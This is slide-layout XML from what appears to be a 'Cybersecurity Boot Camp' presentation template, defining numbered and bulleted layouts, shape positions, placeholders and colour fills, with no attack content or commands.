            <a:off x="1254500" y="11616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2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9" name="Google Shape;289;p2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290" name="Google Shape;290;p2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1" name="Google Shape;291;p2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92" name="Google Shape;292;p2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3" name="Google Shape;293;p2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294" name="Google Shape;294;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1149803"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="295" name="Google Shape;29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296" name="Google Shape;29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97" name="Google Shape;297;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11753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8" name="Google Shape;298;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="16842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9" name="Google Shape;299;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1672428"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="300" name="Google Shape;30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1" name="Google Shape;30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2" name="Google Shape;302;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="125" y="16979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3" name="Google Shape;303;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254475" y="220740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4" name="Google Shape;304;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2195578"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="305" name="Google Shape;30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06" name="Google Shape;30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7" name="Google Shape;307;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="222110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8" name="Google Shape;308;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254475" y="27300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09" name="Google Shape;309;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2718203"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="310" name="Google Shape;31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1" name="Google Shape;31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2" name="Google Shape;312;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125" y="27437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3" name="Google Shape;313;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="3252650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4" name="Google Shape;314;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3240828"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="315" name="Google Shape;31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16" name="Google Shape;31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22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="3266350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18" name="Google Shape;318;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="377527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p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3763453"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="320" name="Google Shape;320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1" name="Google Shape;321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p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50" y="378897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23" name="Google Shape;323;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="4323425"/>
            <a:ext cx="76401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24" name="Google Shape;324;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="4311603"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="325" name="Google Shape;325;p22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26" name="Google Shape;326;p22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7" name="Google Shape;327;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="4337125"/>
            <a:ext cx="8869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6302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. Numbered 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1"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0" name="Google Shape;330;p2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31" name="Google Shape;331;p2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2" name="Google Shape;332;p2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33" name="Google Shape;333;p2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2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5" name="Google Shape;335;p23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6" name="Google Shape;336;p23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37" name="Google Shape;33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38" name="Google Shape;33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Google Shape;339;p23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0" name="Google Shape;340;p23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1" name="Google Shape;341;p23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42" name="Google Shape;34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3" name="Google Shape;34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4" name="Google Shape;344;p23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5" name="Google Shape;345;p23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6" name="Google Shape;346;p23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47" name="Google Shape;34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48" name="Google Shape;34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49" name="Google Shape;349;p23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0" name="Google Shape;350;p23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1" name="Google Shape;351;p23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52" name="Google Shape;35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3" name="Google Shape;35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4" name="Google Shape;354;p23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55" name="Google Shape;355;p23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6" name="Google Shape;356;p23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357" name="Google Shape;35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58" name="Google Shape;35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9" name="Google Shape;359;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="21353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0" name="Google Shape;360;p23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1" name="Google Shape;361;p23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362" name="Google Shape;36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3" name="Google Shape;36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4" name="Google Shape;364;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1225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65" name="Google Shape;365;p23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6" name="Google Shape;366;p23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367" name="Google Shape;367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68" name="Google Shape;368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9" name="Google Shape;369;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="12590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0" name="Google Shape;370;p23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71" name="Google Shape;371;p23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372" name="Google Shape;372;p23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4" name="Google Shape;374;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1697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. Numbered 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1"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2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77" name="Google Shape;377;p2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378" name="Google Shape;378;p2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9" name="Google Shape;379;p2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80" name="Google Shape;380;p2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1" name="Google Shape;381;p2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2" name="Google Shape;382;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179113" y="387300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3" name="Google Shape;383;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="384" name="Google Shape;38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07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85" name="Google Shape;38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24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12100" y="387312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87" name="Google Shape;387;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179000" y="431111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8" name="Google Shape;388;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="389" name="Google Shape;38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08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0" name="Google Shape;39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1" name="Google Shape;391;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="43112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2" name="Google Shape;392;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179063" y="299663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3" name="Google Shape;393;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="394" name="Google Shape;39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05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395" name="Google Shape;39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24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="299675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97" name="Google Shape;397;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178950" y="343473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98" name="Google Shape;398;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="399" name="Google Shape;39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06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0" name="Google Shape;40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1" name="Google Shape;401;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="3434875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2" name="Google Shape;402;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179088" y="2135259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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="404" name="Google Shape;40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05" name="Google Shape;40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1D7E7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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="213537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07" name="Google Shape;407;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178975" y="2573363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8" name="Google Shape;408;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="409" name="Google Shape;40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04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0" name="Google Shape;41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21294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1" name="Google Shape;411;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2573500"/>
            <a:ext cx="88821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2" name="Google Shape;412;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179038" y="1258884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3" name="Google Shape;413;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="414" name="Google Shape;414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15" name="Google Shape;415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16" name="Google Shape;416;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1259000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17" name="Google Shape;417;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178925" y="1696988"/>
            <a:ext cx="76911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8" name="Google Shape;418;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="419" name="Google Shape;419;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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0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20" name="Google Shape;420;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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1" name="Google Shape;421;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1697125"/>
            <a:ext cx="88698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716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. Numbered 1–3 (Green)">
  <p:cSld name="CUSTOM_2_7_1_5"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2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24" name="Google Shape;424;p2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25" name="Google Shape;425;p2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2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27" name="Google Shape;427;p2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2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29" name="Google Shape;429;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="430" name="Google Shape;43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1" name="Google Shape;43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F7EF6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2" name="Google Shape;432;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275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25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275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4" name="Google Shape;434;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3305156" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="435" name="Google Shape;435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36" name="Google Shape;436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AFCA5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p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3572250" y="193777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p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3572250" y="193783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439" name="Google Shape;439;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="1345853"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="440" name="Google Shape;440;p2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441" name="Google Shape;441;p2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4FA78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42" name="Google Shape;442;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1938525"/>
            <a:ext cx="2428500" cy="2662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25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1938587"/>
            <a:ext cx="2371500" cy="266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. Numbered 1–2 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_5_2_1"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Google Shape;445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4286275" y="649650"/>
            <a:ext cx="827450" cy="4115237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2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47" name="Google Shape;447;p2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8" name="Google Shape;448;p2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49" name="Google Shape;449;p2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0" name="Google Shape;450;p2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1" name="Google Shape;451;p2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2" name="Google Shape;452;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936274" y="890150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System Hardening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3" name="Google Shape;453;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5072469" y="1278938"/>
            <a:ext cx="261029" cy="144694"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtract">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365C8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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457246" y="887925"/>
            <a:ext cx="2688300" cy="4767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Alarm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55" name="Google Shape;455;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="575363" y="1276701"/>
            <a:ext cx="226486" cy="144694"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtract">
            <a:avLst/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6" name="Google Shape;456;p2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. Numbered 1–5 (Grey)">
  <p:cSld name="CUSTOM_2_7_1_5_1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9" name="Google Shape;459;p2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60" name="Google Shape;460;p2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1" name="Google Shape;461;p2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62" name="Google Shape;462;p2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3" name="Google Shape;463;p2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64" name="Google Shape;464;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="12527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01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65" name="Google Shape;465;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190550" y="12765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p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133475" y="12765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27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="457188" y="196237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27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="876063" y="196237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27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7934400" y="193852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0" name="Google Shape;470;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2622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1" name="Google Shape;471;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190931" y="2646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27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="2646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p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="514338" y="3408225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4" name="Google Shape;474;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="933213" y="3408225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27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7991550" y="3384375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04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6" name="Google Shape;476;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438150" y="4095388"/>
            <a:ext cx="790500" cy="638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05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477" name="Google Shape;477;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190931" y="4119238"/>
            <a:ext cx="7477200" cy="590700"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A9B7C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27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="4119238"/>
            <a:ext cx="7115400" cy="590700"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd fmla="val 50000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27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="1267550"/>
            <a:ext cx="7434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0" name="Google Shape;480;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1944963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1" name="Google Shape;481;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="264817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2" name="Google Shape;482;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="3394650"/>
            <a:ext cx="91440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457200" spcFirstLastPara="1" rIns="1554475" wrap="square" tIns="0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3" name="Google Shape;483;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="4119225"/>
            <a:ext cx="91686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5460">
          <p15:clr>
            <a:srgbClr val="F9AD4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. Bullets 1–4 (Greens)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2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28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2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87" name="Google Shape;487;p2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488" name="Google Shape;488;p2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9" name="Google Shape;489;p2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490" name="Google Shape;490;p2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91" name="Google Shape;491;p2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2" name="Google Shape;492;p28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3" name="Google Shape;493;p28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28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28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28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7" name="Google Shape;497;p28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8" name="Google Shape;498;p28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499" name="Google Shape;499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28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28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32306" y="39165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28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. Bullets 1–4 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1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29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2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6" name="Google Shape;506;p2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07" name="Google Shape;507;p2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8" name="Google Shape;508;p2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09" name="Google Shape;509;p2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0" name="Google Shape;510;p2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1" name="Google Shape;511;p29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2" name="Google Shape;512;p29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29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4" name="Google Shape;514;p29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29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6" name="Google Shape;516;p29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17" name="Google Shape;517;p29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18" name="Google Shape;518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29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22709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0" name="Google Shape;520;p29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29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82261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. Bullets 1–4 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1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30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4" name="Google Shape;524;p3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25" name="Google Shape;525;p3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26" name="Google Shape;526;p3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28" name="Google Shape;528;p3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0" name="Google Shape;530;p30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1" name="Google Shape;531;p30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30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30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30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5" name="Google Shape;535;p30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36" name="Google Shape;536;p30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37" name="Google Shape;537;p30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30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30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30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. Title Slide: Cybersecurity ">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1_1_1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p4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9" name="Google Shape;29;p4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" name="Google Shape;30;p4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Cybersecurity Boot Camp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1" name="Google Shape;31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2" name="Google Shape;32;p4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3" name="Google Shape;33;p4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4" name="Google Shape;34;p4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pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Google Shape;35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52144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4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. Bullets 1–4 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1_1"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31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3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4" name="Google Shape;544;p3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45" name="Google Shape;545;p3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6" name="Google Shape;546;p3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47" name="Google Shape;547;p3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8" name="Google Shape;548;p3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49" name="Google Shape;549;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12225" y="1398000"/>
            <a:ext cx="91440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0" name="Google Shape;550;p31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p31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2" name="Google Shape;552;p31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3" name="Google Shape;553;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-122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4" name="Google Shape;554;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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55" name="Google Shape;555;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr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56" name="Google Shape;556;p31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402811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31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2270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31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305619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31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32306" y="3916573"/>
            <a:ext cx="785567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. Bullets 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4_1"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2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3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3" name="Google Shape;563;p3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64" name="Google Shape;564;p3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5" name="Google Shape;565;p3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66" name="Google Shape;566;p3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7" name="Google Shape;567;p3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8" name="Google Shape;568;p32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9" name="Google Shape;569;p32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p32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p32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p32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3" name="Google Shape;573;p32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4" name="Google Shape;574;p32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75" name="Google Shape;575;p32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32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77" name="Google Shape;577;p32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32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32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32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1" name="Google Shape;581;p32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. Bullets 1–5 (Green/Yellow)">
  <p:cSld name="CUSTOM_2_7_1_4_1_2"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33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4" name="Google Shape;584;p3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85" name="Google Shape;585;p3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586" name="Google Shape;586;p3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7" name="Google Shape;587;p3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588" name="Google Shape;588;p3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9" name="Google Shape;589;p3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0" name="Google Shape;590;p33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1" name="Google Shape;591;p33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2" name="Google Shape;592;p33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3" name="Google Shape;593;p33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4" name="Google Shape;594;p33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5" name="Google Shape;595;p33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6" name="Google Shape;596;p33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97" name="Google Shape;597;p33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33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599" name="Google Shape;599;p33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33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
